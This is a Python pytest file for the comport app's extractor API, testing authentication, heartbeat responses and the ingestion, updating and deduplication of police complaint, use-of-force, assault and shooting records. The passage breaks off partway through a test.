| 27.638202 | 86 | 0.56842 | 1,395 | 12,299 | 4.903226 | 0.099642 | 0.090058 | 0.070175 | 0.052632 | 0.79576 | 0.789035 | 0.789035 | 0.789035 | 0.784357 | 0.784357 | 0 | 0.002333 | 0.303033 | 12,299 | 444 | 87 | 27.70045 | 0.795614 | 0.000976 | 0 | 0.772512 | 0 | 0 | 0.200895 | 0.030199 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018957 | false | 0.052133 | 0.028436 | 0 | 0.047393 | 0.016588 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
50f2a970f7b7f50e219f8bc346916cbbfc103b4e | 46,875 | py | Python | tests/test_extractor_api.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 35 | 2015-11-14T18:32:45.000Z | 2022-01-23T15:15:05.000Z | tests/test_extractor_api.py | codeforamerica/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 119 | 2015-11-20T22:45:34.000Z | 2022-02-10T23:02:36.000Z | tests/test_extractor_api.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 19 | 2015-11-20T20:41:52.000Z | 2022-01-26T04:12:34.000Z | # -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
import pytest
import responses
import json
from datetime import datetime
from comport.department.models import Department, Extractor
from comport.data.models import OfficerInvolvedShootingIMPD, UseOfForceIncidentIMPD, CitizenComplaintIMPD, AssaultOnOfficerIMPD
from testclient.JSON_test_client import JSONTestClient
from comport.data.cleaners import Cleaners
from flask import current_app
@pytest.mark.usefixtures('db')
class TestHeartbeat:
def test_reject_nonexistent_extractor_post(self, testapp):
''' An extractor login that doesn't exist is rejected.
'''
testapp.authorization = ('Basic', ('extractor', 'nonexistent'))
response = testapp.post("/data/heartbeat", expect_errors=True)
assert response.status_code == 401
assert response.text == 'No extractor with that username!'
def test_reject_extractor_post_with_wrong_password(self, testapp):
''' An extractor login with the wrong password is rejected.
'''
Extractor.create(username='extractor', email='extractor@example.com', password="password")
testapp.authorization = ('Basic', ('extractor', 'drowssap'))
response = testapp.post("/data/heartbeat", expect_errors=True)
assert response.status_code == 401
assert response.text == 'Extractor authorization failed!'
def test_successful_extractor_post(self, testapp):
''' Send a valid heartbeat post, get a valid response.
'''
# set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, _ = Extractor.from_department_and_password(department=department, password="password")
extractor.update(email='extractor@example.com', next_month=10, next_year=2006)
# set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# post a sample json object to the heartbeat URL
response = testapp.post_json("/data/heartbeat", params={"heartbeat": "heartbeat"})
# assert that we got the expected response
assert response.status_code == 200
assert response.json_body['nextMonth'] == 10
assert response.json_body['nextYear'] == 2006
assert response.json_body['received'] == {'heartbeat': 'heartbeat'}
def test_current_mmyy_on_no_setdate(self, testapp):
''' When there is no fixed date, it should send the current month and current year '''
# set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, _ = Extractor.from_department_and_password(department=department, password="password")
# set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# post a sample json object to the heartbeat URL
response = testapp.post_json("/data/heartbeat", params={"heartbeat": "heartbeat"})
# current month and year
now = datetime.now()
# assert that we got the expected response
assert response.status_code == 200
assert response.json_body['nextMonth'] == now.month
assert response.json_body['nextYear'] == now.year
assert response.json_body['received'] == {'heartbeat': 'heartbeat'}
@responses.activate
def test_extractor_post_triggers_slack_notification(self, testapp):
''' A valid heartbeat post triggers a Slack notification
'''
# set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, _ = Extractor.from_department_and_password(department=department, password="password")
# set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# set a fake Slack webhook URL
fake_webhook_url = 'http://webhook.example.com/'
current_app.config['SLACK_WEBHOOK_URL'] = fake_webhook_url
# create a mock to receive POST requests to that URL
responses.add(responses.POST, fake_webhook_url, status=200)
# post a sample json object to the heartbeat URL
testapp.post_json("/data/heartbeat", params={"heartbeat": "heartbeat"})
# test the captured post payload
post_body = json.loads(responses.calls[0].request.body)
assert 'Comport Pinged by Extractor!' in post_body['text']
# delete the fake Slack webhook URL
del(current_app.config['SLACK_WEBHOOK_URL'])
# reset the mock
responses.reset()
def test_post_assaults_data(self, testapp):
''' New assaults data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of assault descriptions from the JSON test client
test_client = JSONTestClient()
assault_count = 1
assault_data = test_client.get_prebaked_assaults(last=assault_count)
# post the json to the assault URL
response = testapp.post_json("/data/assaults", params={'month': 0, 'year': 0, 'data': assault_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == assault_count
# check the assault incident in the database against the data that was sent
cleaner = Cleaners()
sent_assault = cleaner.capitalize_incident(assault_data[0])
check_assault = AssaultOnOfficerIMPD.query.filter_by(opaque_id=sent_assault['opaqueId']).first()
assert check_assault.service_type == sent_assault['serviceType']
assert check_assault.force_type == sent_assault['forceType']
assert check_assault.assignment == sent_assault['assignment']
assert check_assault.arrest_made == sent_assault['arrestMade']
assert check_assault.officer_injured == sent_assault['officerInjured']
assert check_assault.officer_killed == sent_assault['officerKilled']
assert check_assault.report_filed == sent_assault['reportFiled']
def test_post_complaint_data(self, testapp):
''' New complaint data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_count = 1
complaint_data = test_client.get_prebaked_complaints(last=complaint_count)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == complaint_count
# check the complaint incident in the database against the data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_complaint['occuredDate']
assert check_complaint.division == sent_complaint['division']
assert check_complaint.precinct == sent_complaint['precinct']
assert check_complaint.shift == sent_complaint['shift']
assert check_complaint.beat == sent_complaint['beat']
assert check_complaint.disposition == sent_complaint['disposition']
assert check_complaint.service_type == sent_complaint['serviceType']
assert check_complaint.source == sent_complaint['source']
assert check_complaint.allegation_type == sent_complaint['allegationType']
assert check_complaint.allegation == sent_complaint['allegation']
assert check_complaint.resident_race == cleaner.race(sent_complaint['residentRace'])
assert check_complaint.resident_sex == cleaner.sex(sent_complaint['residentSex'])
assert check_complaint.resident_age == cleaner.number_to_string(sent_complaint['residentAge'])
assert check_complaint.officer_identifier == sent_complaint['officerIdentifier']
assert check_complaint.officer_race == cleaner.race(sent_complaint['officerRace'])
assert check_complaint.officer_sex == cleaner.sex(sent_complaint['officerSex'])
assert check_complaint.officer_age == cleaner.number_to_string(sent_complaint['officerAge'])
assert check_complaint.officer_years_of_service == cleaner.number_to_string(sent_complaint['officerYearsOfService'])
def test_correct_complaint_cap(self, testapp):
''' New complaint data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_count = 1
complaint_data = test_client.get_prebaked_complaints(last=complaint_count)
complaint_data[0]["allegation"] = "Rude, demeaning, or affronting language"
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == complaint_count
# check the complaint incident in the database against the data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.allegation == "Rude, Demeaning, or Affronting Language"
def test_post_mistyped_complaint_data(self, testapp):
''' New complaint data from the extractor with wrongly typed data is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_count = 1
complaint_data = test_client.get_prebaked_complaints(last=complaint_count)
# The app expects number values to be transmitted as strings. Let's change them to integers.
complaint_data[0]['residentAge'] = 28
complaint_data[0]['officerAge'] = 46
complaint_data[0]['officerYearsOfService'] = 17
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == complaint_count
# check the complaint incident in the database against the data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_complaint['occuredDate']
assert check_complaint.division == sent_complaint['division']
assert check_complaint.precinct == sent_complaint['precinct']
assert check_complaint.shift == sent_complaint['shift']
assert check_complaint.beat == sent_complaint['beat']
assert check_complaint.disposition == sent_complaint['disposition']
assert check_complaint.service_type == sent_complaint['serviceType']
assert check_complaint.source == sent_complaint['source']
assert check_complaint.allegation_type == sent_complaint['allegationType']
assert check_complaint.allegation == sent_complaint['allegation']
assert check_complaint.resident_race == cleaner.race(sent_complaint['residentRace'])
assert check_complaint.resident_sex == cleaner.sex(sent_complaint['residentSex'])
assert check_complaint.resident_age == cleaner.number_to_string(sent_complaint['residentAge'])
assert check_complaint.officer_identifier == sent_complaint['officerIdentifier']
assert check_complaint.officer_race == cleaner.race(sent_complaint['officerRace'])
assert check_complaint.officer_sex == cleaner.sex(sent_complaint['officerSex'])
assert check_complaint.officer_age == cleaner.number_to_string(sent_complaint['officerAge'])
assert check_complaint.officer_years_of_service == cleaner.number_to_string(sent_complaint['officerYearsOfService'])
def test_update_complaint_data(self, testapp):
''' Updated complaint data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_data = test_client.get_prebaked_complaints(last=1)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked complaint
updated_complaint_data = test_client.get_prebaked_complaints(first=1, last=2)
# Swap in the opaque ID from the first complaint
updated_complaint_data[0]["opaqueId"] = complaint_data[0]["opaqueId"]
# The complaint won't be a match unless these fields are the same
updated_complaint_data[0]["allegationType"] = complaint_data[0]["allegationType"]
updated_complaint_data[0]["allegation"] = complaint_data[0]["allegation"]
updated_complaint_data[0]["officerIdentifier"] = complaint_data[0]["officerIdentifier"]
updated_complaint_data[0]["residentRace"] = complaint_data[0]["residentRace"]
updated_complaint_data[0]["residentSex"] = complaint_data[0]["residentSex"]
updated_complaint_data[0]["residentAge"] = complaint_data[0]["residentAge"]
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': updated_complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 1
assert response.json_body['added'] == 0
# There's only one complaint in the database.
all_complaints = CitizenComplaintIMPD.query.all()
assert len(all_complaints) == 1
# check the complaint incident in the database against the updated data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(updated_complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_complaint['occuredDate']
assert check_complaint.division == sent_complaint['division']
assert check_complaint.precinct == sent_complaint['precinct']
assert check_complaint.shift == sent_complaint['shift']
assert check_complaint.beat == sent_complaint['beat']
assert check_complaint.disposition == sent_complaint['disposition']
assert check_complaint.service_type == sent_complaint['serviceType']
assert check_complaint.source == sent_complaint['source']
assert check_complaint.allegation_type == sent_complaint['allegationType']
assert check_complaint.allegation == sent_complaint['allegation']
assert check_complaint.resident_race == cleaner.race(sent_complaint['residentRace'])
assert check_complaint.resident_sex == cleaner.sex(sent_complaint['residentSex'])
assert check_complaint.resident_age == cleaner.number_to_string(sent_complaint['residentAge'])
assert check_complaint.officer_identifier == sent_complaint['officerIdentifier']
assert check_complaint.officer_race == cleaner.race(sent_complaint['officerRace'])
assert check_complaint.officer_sex == cleaner.sex(sent_complaint['officerSex'])
assert check_complaint.officer_age == cleaner.number_to_string(sent_complaint['officerAge'])
assert check_complaint.officer_years_of_service == cleaner.number_to_string(sent_complaint['officerYearsOfService'])
def test_skip_multiple_complaint_data(self, testapp):
''' Multiple complaint data from the extractor is skipped.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_data = test_client.get_prebaked_complaints(last=1)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked complaint
multiple_complaint_data = test_client.get_prebaked_complaints(first=1, last=2)
# Swap in the opaque ID from the first complaint
multiple_complaint_data[0]["opaqueId"] = complaint_data[0]["opaqueId"]
# The complaint will be skipped as a 'multiple' if these fields are the same
multiple_complaint_data[0]["allegationType"] = complaint_data[0]["allegationType"]
multiple_complaint_data[0]["allegation"] = complaint_data[0]["allegation"]
multiple_complaint_data[0]["officerIdentifier"] = complaint_data[0]["officerIdentifier"]
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': multiple_complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 0
# There is one complaint in the database.
all_complaints = CitizenComplaintIMPD.query.all()
assert len(all_complaints) == 1
def test_post_complaint_data_near_match_does_not_update(self, testapp):
''' Complaint data with the same ID but different details creates a new record.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_data = test_client.get_prebaked_complaints(last=1)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked complaint
updated_complaint_data = test_client.get_prebaked_complaints(first=1, last=2)
# Swap in the opaque ID from the first complaint
updated_complaint_data[0]["opaqueId"] = complaint_data[0]["opaqueId"]
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': updated_complaint_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# There are two complaints in the database.
all_complaints = CitizenComplaintIMPD.query.all()
assert len(all_complaints) == 2
def test_post_uof_data(self, testapp):
''' New UOF data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_count = 1
uof_data = test_client.get_prebaked_uof(last=uof_count)
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == uof_count
# check the uof incident in the database against the data that was sent
cleaner = Cleaners()
sent_uof = uof_data[0]
check_uof = UseOfForceIncidentIMPD.query.filter_by(opaque_id=sent_uof['opaqueId']).first()
assert check_uof.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_uof['occuredDate']
assert check_uof.division == cleaner.capitalize(sent_uof['division'])
assert check_uof.precinct == cleaner.capitalize(sent_uof['precinct'])
assert check_uof.shift == cleaner.capitalize(sent_uof['shift'])
assert check_uof.beat == cleaner.capitalize(sent_uof['beat'])
assert check_uof.disposition == sent_uof['disposition']
assert check_uof.officer_force_type == cleaner.officer_force_type(sent_uof['officerForceType'])
assert check_uof.use_of_force_reason == sent_uof['useOfForceReason']
assert check_uof.service_type == sent_uof['serviceType']
assert check_uof.arrest_made == sent_uof['arrestMade']
assert check_uof.arrest_charges == sent_uof['arrestCharges']
assert check_uof.resident_weapon_used == sent_uof['residentWeaponUsed']
assert check_uof.resident_injured == sent_uof['residentInjured']
assert check_uof.resident_hospitalized == sent_uof['residentHospitalized']
assert check_uof.officer_injured == sent_uof['officerInjured']
assert check_uof.officer_hospitalized == sent_uof['officerHospitalized']
assert check_uof.resident_race == cleaner.race(sent_uof['residentRace'])
assert check_uof.resident_sex == cleaner.sex(sent_uof['residentSex'])
assert check_uof.resident_age == cleaner.number_to_string(sent_uof['residentAge'])
assert check_uof.resident_condition == sent_uof['residentCondition']
assert check_uof.officer_identifier == sent_uof['officerIdentifier']
assert check_uof.officer_race == cleaner.race(sent_uof['officerRace'])
assert check_uof.officer_sex == cleaner.sex(sent_uof['officerSex'])
assert check_uof.officer_age == cleaner.number_to_string(sent_uof['officerAge'])
assert check_uof.officer_years_of_service == cleaner.number_to_string(sent_uof['officerYearsOfService'])
assert check_uof.officer_condition == sent_uof['officerCondition']
def test_post_mistyped_uof_data(self, testapp):
''' New UOF data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_count = 1
uof_data = test_client.get_prebaked_uof(last=uof_count)
# The app expects number values to be transmitted as strings. Let's change them to integers.
uof_data[0]['residentAge'] = 28
uof_data[0]['officerAge'] = 46
uof_data[0]['officerYearsOfService'] = 17
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == uof_count
# check the uof incident in the database against the data that was sent
cleaner = Cleaners()
sent_uof = uof_data[0]
check_uof = UseOfForceIncidentIMPD.query.filter_by(opaque_id=sent_uof['opaqueId']).first()
assert check_uof.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_uof['occuredDate']
assert check_uof.division == cleaner.capitalize(sent_uof['division'])
assert check_uof.precinct == cleaner.capitalize(sent_uof['precinct'])
assert check_uof.shift == cleaner.capitalize(sent_uof['shift'])
assert check_uof.beat == cleaner.capitalize(sent_uof['beat'])
assert check_uof.disposition == sent_uof['disposition']
assert check_uof.officer_force_type == cleaner.officer_force_type(sent_uof['officerForceType'])
assert check_uof.use_of_force_reason == sent_uof['useOfForceReason']
assert check_uof.service_type == sent_uof['serviceType']
assert check_uof.arrest_made == sent_uof['arrestMade']
assert check_uof.arrest_charges == sent_uof['arrestCharges']
assert check_uof.resident_weapon_used == sent_uof['residentWeaponUsed']
assert check_uof.resident_injured == sent_uof['residentInjured']
assert check_uof.resident_hospitalized == sent_uof['residentHospitalized']
assert check_uof.officer_injured == sent_uof['officerInjured']
assert check_uof.officer_hospitalized == sent_uof['officerHospitalized']
assert check_uof.resident_race == cleaner.race(sent_uof['residentRace'])
assert check_uof.resident_sex == cleaner.sex(sent_uof['residentSex'])
assert check_uof.resident_age == cleaner.number_to_string(sent_uof['residentAge'])
assert check_uof.resident_condition == sent_uof['residentCondition']
assert check_uof.officer_identifier == sent_uof['officerIdentifier']
assert check_uof.officer_race == cleaner.race(sent_uof['officerRace'])
assert check_uof.officer_sex == cleaner.sex(sent_uof['officerSex'])
assert check_uof.officer_age == cleaner.number_to_string(sent_uof['officerAge'])
assert check_uof.officer_years_of_service == cleaner.number_to_string(sent_uof['officerYearsOfService'])
assert check_uof.officer_condition == sent_uof['officerCondition']
def test_update_uof_data(self, testapp):
''' Updated UOF data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_data = test_client.get_prebaked_uof(last=1)
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked uof incident
updated_uof_data = test_client.get_prebaked_uof(first=1, last=2)
# Swap in the opaque ID from the first uof incident
updated_uof_data[0]["opaqueId"] = uof_data[0]["opaqueId"]
# The uof incident won't be a match unless these fields are the same
updated_uof_data[0]["officerIdentifier"] = uof_data[0]["officerIdentifier"]
updated_uof_data[0]["officerForceType"] = uof_data[0]["officerForceType"]
# post the json to the uof URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': updated_uof_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 1
assert response.json_body['added'] == 0
# There's only one complaint in the database.
all_uof = UseOfForceIncidentIMPD.query.all()
assert len(all_uof) == 1
# check the uof incident in the database against the updated data that was sent
cleaner = Cleaners()
sent_uof = updated_uof_data[0]
check_uof = UseOfForceIncidentIMPD.query.filter_by(opaque_id=sent_uof['opaqueId']).first()
assert check_uof.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_uof['occuredDate']
assert check_uof.division == cleaner.capitalize(sent_uof['division'])
assert check_uof.precinct == cleaner.capitalize(sent_uof['precinct'])
assert check_uof.shift == cleaner.capitalize(sent_uof['shift'])
assert check_uof.beat == cleaner.capitalize(sent_uof['beat'])
assert check_uof.disposition == sent_uof['disposition']
assert check_uof.officer_force_type == cleaner.officer_force_type(sent_uof['officerForceType'])
assert check_uof.use_of_force_reason == sent_uof['useOfForceReason']
assert check_uof.service_type == sent_uof['serviceType']
assert check_uof.arrest_made == sent_uof['arrestMade']
assert check_uof.arrest_charges == sent_uof['arrestCharges']
assert check_uof.resident_weapon_used == sent_uof['residentWeaponUsed']
assert check_uof.resident_injured == sent_uof['residentInjured']
assert check_uof.resident_hospitalized == sent_uof['residentHospitalized']
assert check_uof.officer_injured == sent_uof['officerInjured']
assert check_uof.officer_hospitalized == sent_uof['officerHospitalized']
assert check_uof.resident_race == cleaner.race(sent_uof['residentRace'])
assert check_uof.resident_sex == cleaner.sex(sent_uof['residentSex'])
assert check_uof.resident_age == cleaner.number_to_string(sent_uof['residentAge'])
assert check_uof.resident_condition == sent_uof['residentCondition']
assert check_uof.officer_identifier == sent_uof['officerIdentifier']
assert check_uof.officer_race == cleaner.race(sent_uof['officerRace'])
assert check_uof.officer_sex == cleaner.sex(sent_uof['officerSex'])
assert check_uof.officer_age == cleaner.number_to_string(sent_uof['officerAge'])
assert check_uof.officer_years_of_service == cleaner.number_to_string(sent_uof['officerYearsOfService'])
assert check_uof.officer_condition == sent_uof['officerCondition']
def test_post_uof_data_near_match_does_not_update(self, testapp):
''' UOF data with the same ID but different details creates a new record.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_data = test_client.get_prebaked_uof(last=1)
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked uof incident
updated_uof_data = test_client.get_prebaked_uof(first=1, last=2)
# Swap in the opaque ID from the first uof incident
updated_uof_data[0]["opaqueId"] = uof_data[0]["opaqueId"]
# post the json to the uof URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': updated_uof_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# There's only one complaint in the database.
all_uof = UseOfForceIncidentIMPD.query.all()
assert len(all_uof) == 2
def test_post_ois_data(self, testapp):
''' New OIS data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_count = 1
ois_data = test_client.get_prebaked_ois(last=ois_count)
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == ois_count
# check the ois incident in the database against the data that was sent
cleaner = Cleaners()
sent_ois = ois_data[0]
check_ois = OfficerInvolvedShootingIMPD.query.filter_by(opaque_id=sent_ois['opaqueId']).first()
assert check_ois.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_ois['occuredDate']
assert check_ois.division == cleaner.capitalize(sent_ois['division'])
assert check_ois.precinct == cleaner.capitalize(sent_ois['precinct'])
assert check_ois.shift == cleaner.capitalize(sent_ois['shift'])
assert check_ois.beat == cleaner.capitalize(sent_ois['beat'])
assert check_ois.disposition == sent_ois['disposition']
assert check_ois.resident_race == cleaner.race(sent_ois['residentRace'])
assert check_ois.resident_sex == cleaner.sex(sent_ois['residentSex'])
assert check_ois.resident_age == cleaner.number_to_string(sent_ois['residentAge'])
assert check_ois.resident_weapon_used == cleaner.resident_weapon_used(sent_ois['residentWeaponUsed'])
assert check_ois.resident_condition == sent_ois['residentCondition']
assert check_ois.officer_identifier == sent_ois['officerIdentifier']
assert check_ois.officer_weapon_used == sent_ois['officerForceType']
assert check_ois.officer_race == cleaner.race(sent_ois['officerRace'])
assert check_ois.officer_sex == cleaner.sex(sent_ois['officerSex'])
assert check_ois.officer_age == cleaner.number_to_string(sent_ois['officerAge'])
assert check_ois.officer_years_of_service == cleaner.string_to_integer(sent_ois['officerYearsOfService'])
assert check_ois.officer_condition == sent_ois['officerCondition']
def test_post_mistyped_ois_data(self, testapp):
''' New OIS data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_count = 1
ois_data = test_client.get_prebaked_ois(last=ois_count)
# The app expects number values to be transmitted as strings. Let's change them to integers.
ois_data[0]['residentAge'] = 28
ois_data[0]['officerAge'] = 46
# And it expects this number value to be transmitted as a number, so let's make it a string.
ois_data[0]['officerYearsOfService'] = "17"
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
# assert that we got the expected reponse
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == ois_count
# check the ois incident in the database against the data that was sent
cleaner = Cleaners()
sent_ois = ois_data[0]
check_ois = OfficerInvolvedShootingIMPD.query.filter_by(opaque_id=sent_ois['opaqueId']).first()
assert check_ois.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_ois['occuredDate']
assert check_ois.division == cleaner.capitalize(sent_ois['division'])
assert check_ois.precinct == cleaner.capitalize(sent_ois['precinct'])
assert check_ois.shift == cleaner.capitalize(sent_ois['shift'])
assert check_ois.beat == cleaner.capitalize(sent_ois['beat'])
assert check_ois.disposition == sent_ois['disposition']
assert check_ois.resident_race == cleaner.race(sent_ois['residentRace'])
